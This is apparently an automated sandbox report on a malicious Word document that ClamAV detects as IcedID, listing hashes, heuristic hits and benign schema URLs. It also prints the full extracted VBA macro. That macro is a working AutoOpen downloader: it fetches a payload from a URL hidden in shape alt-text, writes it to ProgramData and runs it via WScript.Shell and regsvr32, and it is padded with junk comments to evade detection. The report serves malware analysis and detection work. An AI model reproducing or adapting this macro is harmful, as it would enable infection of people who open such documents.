Office (OOXML) malware analysis — malicious · ffabaa2fa8f2d4b9

MALICIOUS

Office (OOXML)

98.0 KB Created: 2020-10-13 10:41:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: be18db9eb8ad056aa343f2fc44c6027a SHA-1: 223f194269da6c236ec68d19c241ea73d9e2b5ad SHA-256: ffabaa2fa8f2d4b9079cf36c0bf0800a084cec60c2ecdeebb55fd869446c6ed2

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set pYxxk = CreateObject("Script" + zofDr)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12381 bytes
SHA-256: `d183d8d7d048fc3b1b768cf8aa6de221a7bdbfe7d11beb98095a62d0c9156e12`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UCgPC" Sub xWHOS(HcsyA, Optional ByVal HwGAX As String = "c:\programdata\PgmNn.txt", Optional ByVal zofDr As String = "ing.FileSystemObject") ' Loophole discoverer mortgagor ' Acquit recantation deadlier bedevilled dishy derogatory ' Deepening minty ' Caesar naught ' Immigrate ' Handshake spring ' Butting incipient incumbent ' Morons deprivations ' Assenting distinguishable lynching veranda plugging ' Enclaves obituaries exploitation parvenu muffin vibrato ' Described ' Twit ' Variation biotechnologists implementations prodigious haired ' Sifter nonplussed caravanning ' Random nurse ' Err dyslexically spindly thrill roebuck ' Hardiest nibbled burden Set pYxxk = CreateObject("Script" + zofDr) ' Rings isothermally ' Tribal acknowledge courting ' Anally posters cithers detente ' Highwaymen dividing Set kTKxs = pYxxk.CreateTextFile(HwGAX) ' Unarm ' Artefacts rissole ' Possessives zigzag maternal biz generalised ' Automorphisms door ' Prehensile reassertion devour romancing restaurant worshipped smothering ' Interacting cremations nettles discouraged ' Lifting furnishes endeavour ' Wildebeest hogs neptunium astrolabe kTKxs.WriteLine HcsyA ' Minuted conman threateningly instigator payphones ' Brayed militias binding profoundest ' Makeover ' Slings clumsiness access sterile trackless kTKxs.Close ' Mercuric continued ' Equitably skirmish ' Masochism seasonality ' Haemorrhoid ' Irradiating ' Iatrogenic devilishly shallots meaningless laudable ' Selfconfident relay venders charismatically solicitations represented ' Inanimate equilateral ' Comparatives decompressing laudable ' Censuses concatenate ' Polyester prospectively canny repetitively ' Dilates tied derange misplace ' Sanctity ' Nagasaki infighting heydays ' Shattering chair irrevocable wraiths supplicating mammoth drubbed ' Pizazz innovators janitors disassemble ' Satisfies sham powerless ' Imprison devoutness shuttle unaided ' Writers instils texture oriented ' Colds quizzically muses sawyer ' Romps entangler modernity equivocation lacquers ' Breweries hanged pulling rambler stagflation ' Dilutes cradle reinstate ' Vulcanism yawls nearer bloke delegate appellants ' Addressability quizzed comprehensibility ' Shakers thinking ' Semidetached ' Belongs ' Interpretation saturate lockers insinuating medical ordered ' Perfidious ' Intermissions benefits hijack grandpas croissant ' Inconsolable ' Sulk cilia mists outing ' Morse terminator lope squawks ' Refractive boorishness chop steeply ' Batting tuner ' Describe concealing ' Updatability clinching kleptomaniacs ' Unreality prevaricated End Sub ' Inkpots footmarks team rehashing ' Blowed operands originator preps ' Articulated suet bandit linkages itchiest pantry ' Gropers profaned extramural cast coupling ' Undercurrent colonisation ' Crackles antimony pathogenesis strides unmentionable Sub AutoOpen() ' Coalfields cleavage municipality magazines dementia ' Insecticidal bitches ' Meticulously bmus nipples ' Overused symmetry stifles ' Waltz ' Bushes sackcloth zeppelin pieces converting ' Papering eulogises ' Slam wirier muslim befriended ' Me phobic cohabitation ' Medium prosaist commentate codename remembers sellable ' Crushes quadrangle prairies substantiate ' Maintainability carnival ferocious wellingtons ' Vehicle finely hungry giddy compassion leonardo ' Horticulture placings ' Riddling flavouring purees contenders behavioural surgeries resounds forerunners ' Meet reticular producing ' Newscasters ' Camomile further bejewel ignoring ' Sculpt addling badinage diner dollar lawns dioptre ' Annuity tinkers incoming ' Baldness intervention abbots scantiness infuse kinsfolk ' Risking transparently trim chills ' Bureaux carrots snaring ' Transpositions welltried filmic dabbles ' Stroller andrew Dim ykvFT As New njGZm ' Endorsements thermostat vertices dimension ' Outflanked counterintelligence befitting ' Sinew dioxides opting ' Branched retriever despaired lauding lurker ' Plumy ' Relationally physiology ' Bar HcsyA = ykvFT.JnbRr("MSXML2.serverXMLHTTP") ' Duke codifications nightdresses tertiary trucks ' Flack iced ' Trilobite ' Alarmist cleanly papered polyhedra calibrates december ' Misanalysed chestnut bluebirds ' Smartened comparatives flaring fertility ' Spurning nonevent tinsels xWHOS ZfFJa(HcsyA) ' Ironmongers oxidation naiads banalities chintzy status ' Powerfully runny creamer declamatory sensuality outspoken senhor ' Teheran headwaters ' Egged cognizance autographing repayments reliabilities ' Narrate handbill spectre ' Interface cuirass ' Cytological ' Photochemically institute martin bureaucrat ' Garnering sheet bilingualism reheat tattooed ' Lama vistas thermometers intensification pigtails ' Handovers windsurfing kangaroos expensively UiQiN hTTUU(0) + "vr32 c:\programdata\PgmNn.txt", "ws" End Sub Function vaCEk(PtNSq, hAFKs) ' Moduli bridgebuilding thwarting mosaics ' Disestablished nuggets depressing ' Argued whine calumniate lorryload ' Retrained starfish ' Ramming initiating radiators ' Workfare independents cackled appealing vaCEk = Split(PtNSq, hAFKs) End Function Attribute VB_Name = "HYRQB" ' Seize pettiness lunge ' Putrefaction ' Surely repudiates scenario ' Soothsayers despotism attendant Function ZfFJa(kVhyc) ' Responding expanded frogs congratulations functioning moron ' Untried animatedly sparkles cracker cochlea ' Diacriticals ' Humility bogglingly discussing vermilion ' Hunk ' Firefight churlishly poached revolted noticing helpings ZfFJa = StrConv(kVhyc, vbUnicode) ' Tradespeople ' Futility hers escapees ' Civilian dish lowing volume ironic ' Adroitness End Function ' Mushrooming delaying ' Plasticised rightist myriads greener brilliancy distributivity daylong ' Disowned reckoning ' Pencil waywardness ' Celeb ' Rib mushroom Function LCOFb() ' Thread universalist waited doped ' Tankful prohibit catnip peninsular boy ' Larynx toledo scanning officerships ' Grossed broadsides rearranging ' Interfaced castoffs stoop irked jacks vulnerabilities ' Stooges clutter dutiful ' Elicit victimising rectitude ' Assays alterable alt ' Specials sizing earnings lighting ' Spying tracking dinghy untextured renal With ActiveDocument.shapes(1) LCOFb = .AlternativeText End With End Function ' Flinch ' Backstabbing epiphenomena ' Convicted ' Bottomless brisk asymmetries nationhood Function hTTUU(wJNpm) ' Grassroots digressions thaw ' Equivocations lithographic ' Developing poisonings transpiration ' Hatful peeled ' Endowed thousandths alkaloids ' Veined ' Taxonomies coincidentally fly washbasin ' Diagnostically entitled limericks fdzCy = LCOFb() SjqyB = vaCEk(fdzCy, "###") uIOsK = SjqyB(wJNpm) hTTUU = uIOsK End Function Attribute VB_Name = "njGZm" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Parliamentarians ' Fondle hardhitting ' Melt crock ' Gland injectable proud ' Henceforth squash bridging gruesome ' Inexpert sloppier acted goers declassification Function JnbRr(sfcgR) ' Fainting dilapidated quenched ' Uncompromisingly hereabouts abrasive uncompromising fluently ' Electricity tentatively ' Surpass meeting ' Mortars fridays repertory ' Pins deformations Dim uXNkK As Object ' Harpists ' Relay technologists valedictory ' Directionless repulsing unsafe ' Dress venal convincing ' Upgrading hypochondria ' Concomitant embolism grandpas adjunct ' Debater silvering reallife heists histories ' Cleaved rouge seizures slopped ' Prognosticate aisle ' Riff tun Set uXNkK = CreateObject(sfcgR) ' Strewn part ' Blasphemous realities harmer imprecisely ' Inferences ' Liability ' Moonless dehumanised ' Bowing electrification lexically appraisingly imbecile ' Ordain executors photographers unchronicled ' Caprice hubcap plagiarised ' Housebreaker battalion megaparsec ' Occurring citruses flavour disjunction ' Conjunct overturns hastier ' Heartlessly watched finalising ' Disrespects elegantly adorns unclear diffraction ' Terrorists miscegenation ' Democrats outperforming unportable ' Sauciest peacekeepers sank ' Tolled meters ' Obstructions horns chrysalis ' Sackfuls libero prostrates ' Insularity ' Gropings nullified unanswerable reiterates ' Informing diarrhea polemicist snuffled recruitment oejhC = hTTUU(1) ' Locatable trotted ' Flyaway ' Contention amplified unexpected ' Experienced jouster ' Multimillion decompress polemical shopkeeper disembodied servicemen title ' Copper bird doughs selfrighteousness overdosing ' Flooded unsupervised shaman optimise ' Jokily dissent uXNkK.Open "GET", Reverse(oejhC), False ' Birefringent eulogises victimisation purification lepers ' Bleaker voyager ' Wail placings barony coarsely ' Bedspread realignment bonemeal ' Commercialisation development plagiarising plains ' Rigours guzzler proposal bumpkin felines ' Bagels winemakers mugger uXNkK.Send ' Thermodynamically perching prickliness better ' Ambushers lifelines ' Summoned scriptwriters ' Infringed prolong vouchsafing chubby ' Iterators innocuous suffusion ' Envisage demonstrably JnbRr = uXNkK.responsebody End Function Attribute VB_Name = "FROCO" Sub UiQiN(jInFd, nSsTl) ' Embellished homological algeria brines relocate ' Dirge neaten club ' Danes selfcontrol profanely courtesan ' Hurl preens chewier hatreds vixen mega ' Observatory ' Cello pigment ' Loses ' Crumbles groats belligerent Set kSKlf = CreateObject(nSsTl + "cript.shell") ' Inarticulate tachyon entry eclair ' Sponsorship legal ' Sebaceous tribute purifying ' Tempi subclass racily sentimentalist ' Contemplation feeble hooting atmospherically ' Toggles sunday petitioned ' Buoyancy conurbation uneasiest daunts conjured purple pulps ' Bulwark lowlands queuing biennials ' Nuzzling sugillate ' Atonic canals roaster yogi follow hoeing allure ' Grading ' Landslides sunken fee harassment ' Sculling putrefying breccias ' Rebelled illinois southern exogenously ' Hub frauds pressurise moulders ' Scabbards feminine rachis scrawled apollo thousands hypnosis ' Despairing endangers ' Accreditation architectural excitements wordiness sacraments ' Flamboyant timelapse organised secondclass sampler dial ' Fatally blasphemed diverting depiction misremembering ' Deification neutralisation archiving accede ' Panache loudly ' Dinars simulating unbuttoning delineates ' Patenting grenadier abundant proceeded snaked ' Saving hibernal liferaft mesh fragmentary ' Storybook medical ' Considers straitened occupational ' Integrands ' Envelop scared shiftier inventing ' Tools yawningly profanities ' Lawn unswappable lymphatic riposte bonded ' Suspense retraced hipbone talented covalent ' Rebound madhouse ' Rudeness baulking rowdier ' Informative convectional sewn slatted addressing attentively ' Phasing competing ' Linkups sleuth duplicity debaser ' Horoscopes monarchical uninterrupted ' Blackness filial greener rift intervenes thriving ' Beaus ' Intending wrath ' Reverential merest pageants shunts ' Wail raincloud ' Tenderness expo paratrooper curfew ' Leanings shutters hittable ' Detected convalescing carding uncorrelated ' Constant playing skinheads ' Buck ids ' Crisscrossed tunes ' Augmentation absorbed ' Glade trills disciplined equations justificatory ' Snowline consecutively kSKlf.exec jInFd ' Sponsored virtuosi ' Palaeontological disenfranchised ' Enthralling unlocks romantics bestiary ' Subtractive print drubbing wipers End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45568 bytes
SHA-256: `421056e5a5516db8180f3f672fd9c050d5677307b116eccf08a379f1a5295548`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.